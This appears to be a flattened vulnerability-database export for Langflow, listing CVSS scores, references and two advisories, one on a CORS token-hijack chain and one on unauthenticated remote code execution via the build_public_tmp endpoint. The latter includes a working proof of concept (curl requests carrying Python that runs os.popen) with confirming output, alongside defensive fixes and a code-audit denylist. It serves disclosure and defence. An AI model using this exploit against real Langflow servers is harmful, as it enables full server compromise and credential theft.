scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://vuldb.com/submit/791921
6
reference_url https://vuldb.com/vuln/358233
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://vuldb.com/vuln/358233
7
reference_url https://vuldb.com/vuln/358233/cti
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
3
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/
url https://vuldb.com/vuln/358233/cti
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
9
reference_url https://github.com/advisories/GHSA-9jpj-cph8-w449
reference_id GHSA-9jpj-cph8-w449
reference_type
scores
url https://github.com/advisories/GHSA-9jpj-cph8-w449
fixed_packages
0
url pkg:pypi/langflow@1.9.1
purl pkg:pypi/langflow@1.9.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.1
aliases CVE-2026-6598, GHSA-9jpj-cph8-w449
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ypxh-x2hy-3uhb
19
url VCID-ysnc-jyxb-6qcy
vulnerability_id VCID-ysnc-jyxb-6qcy
summary Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints — including built-in code-execution functionality — allowing the attacker to execute arbitrary code and achieve full system compromise.
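A small model of the two browser gates this chain depends on, added here as an illustration and not Langflow's or Starlette's code: `cors_headers` assumes a permissive middleware reflects the request Origin when `allow_origins` is `*` and `allow_credentials` is true (browsers never honour a literal `*` on a credentialed response), and the cookie rule is the SameSite=None-plus-Secure requirement; preflight is not modelled. Origins such as `https://langflow.example` and `https://evil.example` are constructed.

```python
"""Model of the CORS + cookie chain behind CVE-2025-34291 (added example, not
Langflow or Starlette code).  A permissive middleware is assumed to reflect the
request Origin when allow_origins is '*' and allow_credentials is True; the
browser then applies the two gates modelled below.  Preflight is not modelled."""
from dataclasses import dataclass


@dataclass(frozen=True)
class CorsConfig:
    allow_origins: tuple   # ("*",) or explicit origins
    allow_credentials: bool


@dataclass(frozen=True)
class CookieConfig:
    samesite: str          # "none", "lax" or "strict"
    secure: bool


def cors_headers(cfg, origin):
    """CORS response headers the assumed middleware emits for a request from ``origin``.
    A literal '*' is never honoured by browsers on credentialed responses, which is
    why permissive middleware reflects the caller's origin instead."""
    headers = {}
    if "*" in cfg.allow_origins:
        headers["Access-Control-Allow-Origin"] = origin if cfg.allow_credentials else "*"
    elif origin in cfg.allow_origins:
        headers["Access-Control-Allow-Origin"] = origin
    if cfg.allow_credentials and "Access-Control-Allow-Origin" in headers:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def cookie_sent_cross_site(cookie, https=True):
    """Gate 1: the refresh cookie rides on a cross-site request only for SameSite=None,
    which browsers accept only together with Secure over HTTPS."""
    return cookie.samesite.lower() == "none" and cookie.secure and https


def cross_site_refresh_possible(cfg, cookie, page_origin, https=True):
    """True when a page at page_origin can both send the victim's refresh cookie
    (gate 1) and read the token response (gate 2: ACAO == its origin, ACAC true)."""
    if not cookie_sent_cross_site(cookie, https):
        return False
    h = cors_headers(cfg, page_origin)
    return (h.get("Access-Control-Allow-Origin") == page_origin
            and h.get("Access-Control-Allow-Credentials") == "true")


# Constructed configurations: the vulnerable pair, the corrected pair, and each half-fix.
VULNERABLE = (CorsConfig(("*",), True), CookieConfig("none", True))
HARDENED = (CorsConfig(("https://langflow.example",), True), CookieConfig("lax", True))
CORS_ONLY_FIXED = (HARDENED[0], VULNERABLE[1])
COOKIE_ONLY_FIXED = (VULNERABLE[0], HARDENED[1])
```

Closing either gate breaks the chain, but the corrected pair (explicit origin allowlist plus a SameSite=Lax cookie) is the configuration to ship.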
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-34291
reference_id
reference_type
scores
0
value 0.32746
scoring_system epss
scoring_elements 0.96973
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-34291
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Attend
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/pull/10139
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/10139
3
reference_url https://github.com/langflow-ai/langflow/pull/10696
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/10696
4
reference_url https://github.com/langflow-ai/langflow/pull/9240
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/9240
5
reference_url https://github.com/langflow-ai/langflow/pull/9441
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/9441
6
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml
7
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291
8
reference_url https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Attend
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/
url https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform
9
reference_url https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Attend
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/
url https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-34291
reference_id CVE-2025-34291
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-34291
11
reference_url https://www.crowdsec.net/vulntracking-report/cve-2025-34291
reference_id CVE-2025-34291
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.crowdsec.net/vulntracking-report/cve-2025-34291
12
reference_url https://github.com/advisories/GHSA-577h-p2hh-v4mv
reference_id GHSA-577h-p2hh-v4mv
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-577h-p2hh-v4mv
fixed_packages
0
url pkg:pypi/langflow@1.7.0
purl pkg:pypi/langflow@1.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0
aliases CVE-2025-34291, GHSA-577h-p2hh-v4mv, PYSEC-2025-78
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ysnc-jyxb-6qcy
20
url VCID-zqwj-45w7-7kft
vulnerability_id VCID-zqwj-45w7-7kft
summary
Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint
## Summary

The `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.

This is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.

## Affected Code

### Vulnerable Endpoint (No Authentication)

**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657

```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED
    request: Request,
    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...
):
    """Build a public flow without requiring authentication."""
    client_id = request.cookies.get("client_id")
    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)

    job_id = await start_flow_build(
        flow_id=new_flow_id,
        data=data,  # Attacker's data passed directly to graph builder
        current_user=owner_user,
        ...
    )
```

Compare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.

### Code Execution Chain

When attacker-supplied `data` is provided, it flows through:

1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81`
2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`
3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`
4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527`
5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`
6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28`
7. `code = custom_params.pop("code")` extracts attacker code -- `loading.py:43`
8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9`
9. `prepare_global_scope(module)` -- `validate.py:323`
10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`

### Unsandboxed exec() in prepare_global_scope

**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397

```python
def prepare_global_scope(module):
    exec_globals = globals().copy()

    # Imports are resolved first (any module can be imported)
    for node in imports:
        module_obj = importlib.import_module(module_name)  # line 352
        exec_globals[variable_name] = module_obj

    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)
    if definitions:
        combined_module = ast.Module(body=definitions, type_ignores=[])
        compiled_code = compile(combined_module, "<string>", "exec")
        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION
```

**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system("id")` is an assignment and will be executed during graph building -- before the flow even "runs."

## Prerequisites

1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)
2. Attacker knows the public flow's UUID (discoverable via shared links/URLs)
3. No authentication required -- only a `client_id` cookie (any arbitrary string value)

When `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:

1. `GET /api/v1/auto_login` → obtain superuser token
2. `POST /api/v1/flows/` → create a public flow
3. Exploit via `build_public_tmp` without any auth

## Proof of Concept

### Tested Against

- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)
- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)

### Step 1: Obtain a Public Flow ID

(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)

```bash
# Get superuser token (no credentials needed when AUTO_LOGIN=true)
TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')

# Create a public flow
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \
  | jq -r '.id')

echo "Public Flow ID: $FLOW_ID"
```

### Step 2: Exploit -- Unauthenticated RCE

```bash
# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint
# NO Authorization header, NO API key, NO credentials
curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x":0,"y":0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "required": true,
                "show": true,
                "multiline": true,
                "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code",
                "password": false,
                "advanced": false,
                "dynamic": false
              },
              "_type": "Component"
            },
            "description": "X",
            "base_classes": ["Data"],
            "display_name": "ExploitComp",
            "name": "ExploitComp",
            "frozen": false,
            "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}],
            "field_order": ["code"],
            "beta": false,
            "edited": false
          }
        }
      }],
      "edges": []
    },
    "inputs": null
  }'
```

### Step 3: Verify Code Execution

```bash
# Wait 2 seconds for async graph building
sleep 2

# Check proof file written by attacker's code on the server
cat /tmp/rce-proof
# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali
```

### Actual Test Results

```
======================================================================
LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST
======================================================================
Version:  Langflow 1.7.3

RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-f0d19b36
    hostname: kali
    uid: 1000
    whoami: aviral
    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...
    uname: Linux 6.16.8+kali-amd64

RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-6037a271

RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-4a796556

FINAL RESULTS
  Total checks:   15
  VULNERABLE:     15
  SAFE:           0
  RCE confirmed:  3/3 runs
  Reproducible:   YES (100%)
```

## Impact

- **Unauthenticated Remote Code Execution** with full server process privileges
- **Complete server compromise**: arbitrary file read/write, command execution
- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)
- **Reverse shell access** for persistent access
- **Lateral movement** within the network
- **Data exfiltration** from all flows, messages, and stored credentials in the database

## Comparison with CVE-2025-3248

| Aspect | CVE-2025-3248 | This Vulnerability |
|--------|--------------|-------------------|
| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |
| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |
| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |
| **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` |
| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |
| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |

## Recommended Fix

### Immediate (Short-term)

**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:

```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
    # REMOVED: data parameter -- public flows must use stored data only
    ...
):
```

In `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:

```python
async def create_graph(fresh_session, flow_id_str, flow_name):
    # For public flows, ALWAYS load from database, never from user data
    return await build_graph_from_db(
        flow_id=flow_id,
        session=fresh_session,
        ...
    )
```
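As an added defence-in-depth check, not Langflow's own code: a pre-build audit that parses each node's `template.code.value` with `ast` and reports imports outside an assumed allowlist and calls that go through them or through dangerous builtins, distinguishing what `prepare_global_scope` would execute while the graph is built (module and class level, including `ast.Assign` values) from what only runs when the component is invoked. The allowlist, the flow payload and the two component sources below are constructed samples.

```python
"""Pre-build audit of custom component code carried in Langflow-style flow JSON.
Added example, not Langflow's own code: it parses each node's
data.node.template.code.value with ast and reports non-allowlisted imports plus
calls through them or through dangerous builtins.  Defence in depth only."""
import ast
from dataclasses import dataclass

# Assumed allowlist of import roots; a deployment would derive its own.
ALLOWED_IMPORT_ROOTS = frozenset({"lfx", "langflow", "typing", "pydantic", "json"})
# Builtins that have no business in component code.
DENIED_BUILTINS = frozenset({"exec", "eval", "compile", "open", "__import__", "getattr"})

@dataclass(frozen=True)
class Finding:
    node_id: str
    lineno: int
    at_build_time: bool  # True: executed by exec() while the graph is built
    reason: str

def _root_of(expr):
    """Left-most name of a call target: os.popen -> 'os', Output -> 'Output'."""
    while isinstance(expr, ast.Attribute):
        expr = expr.value
    return expr.id if isinstance(expr, ast.Name) else None

def _walk(node, deferred=False):
    """Yield (node, deferred); deferred code runs only when a function is later called."""
    yield node, deferred
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
        # Defaults and decorators evaluate at definition time; the body does not.
        immediate = list(node.args.defaults) + [d for d in node.args.kw_defaults if d]
        if not isinstance(node, ast.Lambda):
            immediate += node.decorator_list
        for child in immediate:
            yield from _walk(child, deferred)
        for child in ([node.body] if isinstance(node, ast.Lambda) else node.body):
            yield from _walk(child, True)
        return
    for child in ast.iter_child_nodes(node):  # class bodies run at definition time
        yield from _walk(child, deferred)

def audit_component_source(node_id, source, allowed_roots=ALLOWED_IMPORT_ROOTS):
    """Return the Findings for one component's source text."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [Finding(node_id, exc.lineno or 0, True, "unparseable source")]
    findings, suspect_names = [], set(DENIED_BUILTINS)
    for node, deferred in _walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                module = alias.name if isinstance(node, ast.Import) else (node.module or "")
                if module.split(".")[0] in allowed_roots:
                    continue
                suspect_names.add(alias.asname or alias.name.split(".")[0])  # name it binds
                findings.append(Finding(node_id, node.lineno, not deferred,
                                        f"import of non-allowlisted module '{module}'"))
        elif isinstance(node, ast.Call) and _root_of(node.func) in suspect_names:
            findings.append(Finding(node_id, node.lineno, not deferred,
                                    f"call through '{_root_of(node.func)}'"))
    return findings

def audit_flow(flow_data):
    """Audit every node of a flow ``data`` object ({"nodes": [...], "edges": [...]})."""
    findings = []
    for node in flow_data.get("nodes", []):
        code = node.get("data", {}).get("node", {}).get("template", {}).get("code", {})
        if code.get("type") == "code" and isinstance(code.get("value"), str):
            findings.extend(audit_component_source(node.get("id", "?"), code["value"]))
    return findings

def _node(node_id, source):  # constructed node in the shape the advisory's request uses
    return {"id": node_id, "type": "genericNode", "data": {"id": node_id, "node": {
        "template": {"code": {"type": "code", "name": "code", "value": source}}}}}

BENIGN_SOURCE = (
    "from lfx.custom.custom_component.component import Component\n"
    "from lfx.io import Output\n"
    "class EchoComp(Component):\n"
    "    outputs = [Output(display_name='O', name='o', method='run')]\n"
    "    def run(self):\n"
    "        return {'ok': True}\n"
)
SUSPECT_SOURCE = (
    "import os\n"
    "from lfx.custom.custom_component.component import Component\n"
    "_cwd = os.getcwd()  # an ast.Assign: runs during graph building\n"
    "class LeakComp(Component):\n"
    "    def run(self):\n"
    "        return open('/etc/hostname').read()\n"
)
# Constructed sample payload: one clean component and one that must be rejected.
SAMPLE_FLOW = {"nodes": [_node("Benign-1", BENIGN_SOURCE), _node("Suspect-2", SUSPECT_SOURCE)],
               "edges": []}
```

Running `audit_flow(SAMPLE_FLOW)` reports nothing for `Benign-1` and three findings for `Suspect-2`, two of them flagged as executing at build time; a gate like this complements the fix above and is no substitute for it.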
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33017
reference_id
reference_type
scores
0
value 0.24652
scoring_system epss
scoring_elements 0.96242
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33017
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value 9.3
scoring_system cvssv4
